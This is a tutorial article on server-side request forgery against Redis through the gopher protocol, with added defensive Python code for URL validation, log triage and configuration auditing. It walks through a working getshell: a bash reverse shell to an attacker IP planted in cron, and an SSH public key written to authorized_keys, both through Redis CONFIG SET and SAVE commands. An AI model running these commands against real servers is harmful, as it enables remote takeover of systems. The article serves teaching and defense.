2025-02-24 Update. From: SLTechnology News&Howtos > Network Security
Shulou (Shulou.com) 05/31 Report
This article presents an example analysis of server-side request forgery (SSRF) against Redis. It is meant to be easy to follow and well organized, and I hope it helps resolve your doubts; let me walk you through it.
SSRF, server-side request forgery, arises when the server has to fetch a resource and the user controls what is requested, including the protocol, host, port and path. When that control is not restricted, the user can make the server issue requests on their behalf, which is an SSRF attack.
This article focuses on an SSRF attack against a Redis service through the gopher protocol, leading to a shell (getshell).
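As an added example (my own code, not part of the original article), here is the server-side check that closes this class of issue: a URL validator that a fetching endpoint would run before making any outbound request. It allows only http and https, only the usual web ports, and refuses any host that resolves to a loopback, private or otherwise non-global address, so a gopher:// URL pointing at 127.0.0.1:6379 is rejected before a socket is opened. The function names and the static resolver table are assumptions made for the demo.

```python
"""Added example: validate a user-supplied URL before a server-side fetch."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # gopher://, file://, dict:// etc. are refused
ALLOWED_PORTS = {80, 443}             # keeps 6379 (Redis) and other service ports out


def dns_resolver(host):
    """Resolve host to a list of ip_address objects using the system resolver."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return [ipaddress.ip_address(info[4][0]) for info in infos]


def static_resolver(table):
    """Build a resolver from a {host: [ip, ...]} dict so the check runs offline.
    Used by the demo below with constructed data, not real DNS."""
    def resolve(host):
        return [ipaddress.ip_address(ip) for ip in table.get(host, [])]
    return resolve


def validate_outbound_url(url, resolver=dns_resolver):
    """Return (ok, reason). Rejects disallowed schemes and ports and any hostname
    that resolves to a loopback, private, link-local or other non-global address."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    if not parts.hostname:
        return False, "missing host"
    try:
        port = parts.port
    except ValueError:
        return False, "malformed port"
    port = port or (443 if scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        return False, "port not allowed: %d" % port
    # A literal IP in the URL is checked directly; a name is resolved first.
    try:
        addrs = [ipaddress.ip_address(parts.hostname)]
    except ValueError:
        addrs = resolver(parts.hostname)
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:
        if not addr.is_global:
            return False, "host resolves to non-global address %s" % addr
    return True, "ok"


if __name__ == "__main__":
    # Constructed resolver table for an offline demo.
    demo = static_resolver({"files.example.com": ["93.184.216.34"],
                            "rebind.example": ["127.0.0.1"]})
    for candidate in ("https://files.example.com/report.pdf",
                      "gopher://127.0.0.1:6379/_%2a%31%0d%0a",
                      "http://rebind.example/",
                      "http://10.0.0.8/admin"):
        print(candidate, "->", validate_outbound_url(candidate, demo))
```

Validating and then fetching is still a time-of-check/time-of-use gap if the name is resolved twice (DNS rebinding), so the fetch should connect to the address that was validated and pass the hostname only in the Host header or SNI, and redirects should be disabled or re-validated hop by hop.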
Gopher protocol format
First, understand what the gopher protocol is and what its URL format looks like:
gopher://<host>:<port>/_<raw TCP data>
The character after the slash is the gopher item type (an underscore here) and is discarded; everything after it is percent-decoded and sent to host:port as a raw TCP stream.
When testing the attack on Redis, you can use the curl that ships with Linux.
If you use CentOS, it is best to turn off SELinux so that the experiment succeeds.
Turn off SELinux:
setenforce 0
Attacking Redis
(1) Setting up the experimental environment
The virtual machine can be installed with CentOS 7.
Redis installation:
wget http://download.redis.io/releases/redis-4.0.6.tar.gz   # download the Redis source package
yum install gcc                                              # gcc is required by make
tar -xzvf redis-4.0.6.tar.gz                                 # unpack the package
cd redis-4.0.6                                               # enter the unpacked directory
make MALLOC=libc                                             # compile
cd src                                                       # after compilation the binaries are in src
make install                                                 # install
Redis runs:
In the redis-4.0.6 directory, redis.conf is the original Redis configuration file.
Under redis-4.0.6/src there are the two most important executables:
redis-server: the server
redis-cli: the client
Run the server program directly to start the Redis service:
./redis-server
Run the client program directly; it connects to the local Redis service by default:
./redis-cli
(2) Preliminary attempt: attacking Redis without a password
First, start a packet capture so that we can see the packets exchanged with Redis.
On Linux, tcpdump can capture the traffic:
tcpdump -i lo -s 0 port 6379 -w redis.pcap
To capture local traffic, note that the interface is lo, not eth0.
We connect with redis-cli first and then perform a set key operation:
Open the pcap written by tcpdump in Wireshark and follow the TCP stream.
Looking only at the data we sent, not the server's replies, there are just a few lines:
In "Show and save data as", select Hex Dump to get the following data:
The part inside the red box is the payload that will be used later.
Copy everything out and use an editor to strip everything except the bytes in the red box.
Then prefix each hexadecimal byte with a percent sign and join them into one line:
Construct the curl request (the percent-encoded bytes are the RESP encoding of the COMMAND and set key1 value1 requests captured above; --output - writes the reply to standard output):
curl -v 'gopher://127.0.0.1:6379/_%2a%31%0d%0a%24%37%0d%0a%43%4f%4d%4d%41%4e%44%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%34%0d%0a%6b%65%79%31%0d%0a%24%36%0d%0a%76%61%6c%75%65%31%0d%0a' --output -
Server reply:
Query the key:
The key was set successfully.
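When a request like the curl command above turns up in a web server or proxy log, the defender's first question is what it would have made Redis do. The following added example (my own code, not from the article) decodes a gopher:// URL back into the raw bytes curl would send and parses them as Redis RESP commands, flagging the commands that can change where Redis writes files. It is meant for log triage; the sample URLs are the one above and a constructed inline CONFIG GET.

```python
"""Added example: decode a gopher:// URL from a log into the Redis commands it carries."""
from urllib.parse import urlsplit, unquote_to_bytes

REDIS_PORT = 6379
# Commands that change where Redis writes files or trigger a write; the article
# relies on CONFIG SET dir/dbfilename followed by SAVE.
FILE_WRITE_COMMANDS = {"CONFIG", "SAVE", "BGSAVE", "DEBUG", "SLAVEOF", "REPLICAOF", "MODULE"}


def gopher_payload(url):
    """Return the bytes curl would send for a gopher:// URL, or None for other schemes.
    The first character after '/' is the gopher item type ('_' in the article) and is
    not transmitted; the rest of the selector is percent-decoded."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "gopher":
        return None
    selector = parts.path[1:] if parts.path.startswith("/") else parts.path
    if parts.query:
        selector += "?" + parts.query
    return unquote_to_bytes(selector[1:]) if selector else b""


def parse_resp_commands(data):
    """Parse a client-to-server RESP stream into a list of argv lists.
    '*N' arrays of '$len' bulk strings are the normal form; any other line is
    treated as a Redis inline command and split on whitespace."""
    commands = []
    pos = 0
    while pos < len(data):
        if data[pos:pos + 1] == b"*":
            end = data.find(b"\r\n", pos)
            if end == -1:
                raise ValueError("truncated array header at offset %d" % pos)
            argc = int(data[pos + 1:end])
            pos = end + 2
            argv = []
            for _ in range(argc):
                if data[pos:pos + 1] != b"$":
                    raise ValueError("expected bulk string at offset %d" % pos)
                end = data.find(b"\r\n", pos)
                if end == -1:
                    raise ValueError("truncated bulk length at offset %d" % pos)
                length = int(data[pos + 1:end])
                pos = end + 2
                argv.append(data[pos:pos + length].decode("utf-8", "replace"))
                pos += length + 2  # skip the payload and its trailing CRLF
            commands.append(argv)
        else:
            end = data.find(b"\r\n", pos)
            if end == -1:
                end = len(data)
            line = data[pos:end].decode("utf-8", "replace").strip()
            if line:
                commands.append(line.split())
            pos = end + 2
    return commands


def triage_url(url):
    """Describe an SSRF request aimed at Redis, or return None for non-gopher URLs."""
    payload = gopher_payload(url)
    if payload is None:
        return None
    parts = urlsplit(url)
    commands = parse_resp_commands(payload)
    return {
        "target": "%s:%s" % (parts.hostname, parts.port),
        "redis_port": parts.port == REDIS_PORT,
        "commands": commands,
        "dangerous": [c for c in commands if c and c[0].upper() in FILE_WRITE_COMMANDS],
    }


if __name__ == "__main__":
    # First URL is the one from the article; the second is a constructed inline command.
    for sample in ("gopher://127.0.0.1:6379/_%2a%31%0d%0a%24%37%0d%0a%43%4f%4d%4d%41%4e%44%0d%0a"
                   "%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%34%0d%0a%6b%65%79%31%0d%0a"
                   "%24%36%0d%0a%76%61%6c%75%65%31%0d%0a",
                   "gopher://10.0.0.5:6379/_CONFIG%20GET%20dir%0d%0a",
                   "https://example.com/"):
        print(sample[:40], "->", triage_url(sample))
```

Run over access logs, any hit with "redis_port" true is worth an alert on its own, and a non-empty "dangerous" list is the signature of the file-write technique the rest of this article describes.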
Attempting to attack a Redis that uses a password:
Configure Redis to require a password:
Edit redis.conf in the Redis directory and search for the requirepass keyword.
By default requirepass is commented out. Remove the comment character and write the password you want after requirepass.
After configuring, start Redis with:
./redis-server /path/to/redis.conf
Attempting the attack against Redis with a password:
First start the tcpdump capture, then run the commands at the redis-cli prompt:
Capturing the traffic again and operating as before, the only difference for password verification is an additional AUTH command:
Then just repeat the steps above.
(3) GetShell:
Now the main point: getting a shell through set key.
Approach:
(1) Write a reverse-shell command into a scheduled task (cron); the attacker machine only needs to listen on a netcat port.
(2) Write an SSH public key generated with ssh-keygen so that SSH accepts a key-based (passwordless) login.
Taking each in turn.
(1) Reverse shell via a scheduled task
Basic requirement:
Redis must run as root, otherwise it cannot write into the /var/spool/cron/ directory.
1. First, you need to know what a scheduled task is under Linux:
On Linux, scheduled tasks are managed with the crontab command.
The configuration file is /etc/crontab.
The figure below shows the contents of that file, which illustrates the crontab line format well.
That file is for reference only; our scheduled task must be written manually into the /var/spool/cron/ directory.
If we want to run the command echo 1 > /tmp/1.txt every minute,
we can do this:
vim /var/spool/cron/root   # root is the file name; the file is normally named after the user that runs the task
Write into the file:
* * * * * root echo 1 > /tmp/1.txt
After saving and exiting, restart the cron service:
systemctl restart crond.service
The command is now executed every minute.
2. Next, you need to know how a shell is sent back (a reverse shell) under Linux by redirecting the input and output streams.
Command:
/bin/bash -i >& /dev/tcp/192.168.1.105/8888 0>&1
Look directly at the effect:
This is an ingenious combination of Linux file descriptors, redirection operators and the special /dev/tcp path.
File descriptor 0 is standard input.
File descriptor 1 is standard output, and 2 is standard error.
/bin/bash -i starts bash in interactive mode; >& redirects that shell's output (standard output and standard error together) to /dev/tcp/192.168.1.105/8888.
The & after > tells the shell that the target is a stream or descriptor rather than a file name; without it, the redirection would write to a file with that name.
An example makes it clear.
/dev/tcp/<ip address>/<port> is a path that bash treats specially: it is not a real file, but a TCP connection to that address and port.
Here we set it to the address where the attacker machine is listening.
Finally 0>&1: once the connection between attacker and target is established, whatever the attacker types arrives over that connection, and redirecting file descriptor 0 (standard input) to 1 (the socket) makes /bin/bash read it as its standard input, so the attacker's commands are executed.
3. You also need to know how Redis writes to files.
Redis can export (dump) the keys and values of the current database to a file,
and the export path and file name can be set with commands:
config set dir /tmp/test      # set the export directory
config set dbfilename root    # set the export file name
save                          # perform the export
As you can see, the format of the resulting file is very messy, because the key and value are embedded in the binary RDB dump. Fortunately, cron on Linux does not reject the file as long as it can read one correctly formatted line.
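The three commands above only work because the attacked server lets an unauthenticated client run CONFIG and SAVE. As an added example (not from the article), this Python audit parses a redis.conf and reports the settings that make that possible. The two configuration texts are constructed samples, and the requirepass value is a placeholder.

```python
"""Added example: audit redis.conf for the settings the file-write technique relies on."""


def parse_redis_conf(text):
    """Map each directive (lower-cased) to the list of argument lists it appears with."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text):
    """Return a list of findings; an empty list means none of the checks fired."""
    conf = parse_redis_conf(text)
    findings = []
    if not any(args for args in conf.get("requirepass", [])):
        findings.append("no requirepass: any client that reaches the port can run commands")
    binds = [addr for args in conf.get("bind", []) for addr in args]
    if not binds or any(addr in ("0.0.0.0", "::", "*") for addr in binds):
        findings.append("bind missing or wildcard: the port is reachable from other hosts")
    protected = conf.get("protected-mode", [["yes"]])[-1]
    if not protected or protected[0].lower() != "yes":
        findings.append("protected-mode no: unauthenticated remote clients are not refused")
    # rename-command CONFIG "" disables the command; BGSAVE writes the same dump as SAVE.
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    for cmd in ("CONFIG", "SAVE", "BGSAVE"):
        if cmd not in renamed:
            findings.append("%s not renamed: CONFIG SET dir/dbfilename plus a save can write files" % cmd)
    return findings


# Constructed sample: the kind of settings that make the article's attack work.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

# Constructed sample: the same server hardened. The password is a placeholder.
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE_WITH_A_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command SAVE ""
rename-command BGSAVE ""
dir /var/lib/redis
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name + ":", audit_redis_conf(text) or ["no findings"])
```

Note which of these controls actually matter in the SSRF case: protected-mode only refuses clients arriving on non-loopback interfaces, and the curl request in this article reaches Redis from 127.0.0.1, so requirepass and renaming CONFIG are the settings that stop it. Running Redis as an unprivileged user adds a second layer, since a dump written outside its data directory then cannot land in /var/spool/cron or /root/.ssh.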
Scheduled-task getshell through crontab
To make sure Linux can read one line correctly, we manually add \n (newlines) around the value when doing set key.
Redis commands:
config set dir /var/spool/cron
config set dbfilename root
set test1 "\n\n\n* * * * * /bin/bash -i >& /dev/tcp/192.168.1.105/8888 0>&1\n\n\n"
save
Convert to the gopher protocol format and make the curl request:
Successfully written:
Successful getshell:
Note: there is a pitfall here.
The cron file must not contain a user name field, otherwise an error is reported:
(2) Passwordless SSH login
On Linux, SSH can be configured for key-based login without a password.
The SSH configuration file /etc/ssh/sshd_config needs to be modified:
change
# StrictModes yes
to
StrictModes no
Then restart sshd.
Conditions for passwordless login:
The client generates a public/private key pair,
and the public key is uploaded to the server.
For the SSRF exploitation, Redis again needs to run as root;
if it is not running as root, it must run as a user that is allowed to log in over SSH.
Normal passwordless login procedure:
1. The client generates the public and private keys
using the ssh-keygen tool:
ssh-keygen -t rsa
After it runs, the public and private key files are placed in the .ssh folder of the user's home directory:
the public key has the .pub suffix and the private key has no suffix.
2. Upload the public key to the server
Copy the public key into the server's /root/.ssh directory.
If that is troublesome, the ssh-copy-id tool can do it.
3. Rename the file to authorized_keys
The file must be named authorized_keys.
The authorized_keys file looks like this:
If several clients need passwordless login, start a new line and write the corresponding client's public key on it.
Something like this:
4. Passwordless login
Once the key is in place, you can log in without a password:
Passwordless SSH login to getshell
Now that we know where to write the file and what to write (the public key is generated in advance), we can construct the Redis commands:
config set dir /root/.ssh              # first configure the path
config set dbfilename authorized_keys  # and the file name
set test2 "\n\n\nssh-rsa ... root@kali\n\n\n"   # write the public key (key material elided)
save                                   # save
Convert to the gopher protocol format:
View the authorized_keys file:
Successful passwordless login:
The above is the full content of "Example analysis of server-side request forgery (SSRF) in Redis". Thank you for reading! I hope it has given you some understanding and that the content helps you; to learn more, follow the industry information channel.